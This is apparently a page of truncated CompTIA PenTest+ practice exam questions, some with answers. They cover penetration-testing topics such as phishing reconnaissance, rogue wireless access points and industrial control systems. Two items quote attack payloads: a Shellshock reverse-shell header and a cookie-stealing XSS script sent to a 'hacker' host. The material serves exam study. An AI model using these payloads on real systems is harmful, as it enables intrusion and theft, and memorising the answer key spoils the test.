PT0-002 V4

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the...

Which of the following BEST describe the OWASP Top 10? (Choose two.)A . The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F....

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration...

Deconfliction is necessary when the penetration test:A . determines that proprietary information is being stored in cleartext. B. occurs during the monthly vulnerability scanning. C. uncovers indicators of prior compromise over the course of the assessment. D. proceeds in parallel with a criminal digital forensic investigation.View AnswerAnswer: D Explanation: Deconfliction...

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps...

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of...

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?A . PLCs...

During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)A . Scraping social...

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?A . Test for RFC-defined protocol conformance. B. Attempt...

Given the following code: <SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC RIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)A . Web-application firewall B. Parameterized queries C. Output encoding D. Session tokens E. Input validation F. Base64 encodingView AnswerAnswer: C,E Explanation: Encoding (commonly called “Output Encoding”) involves...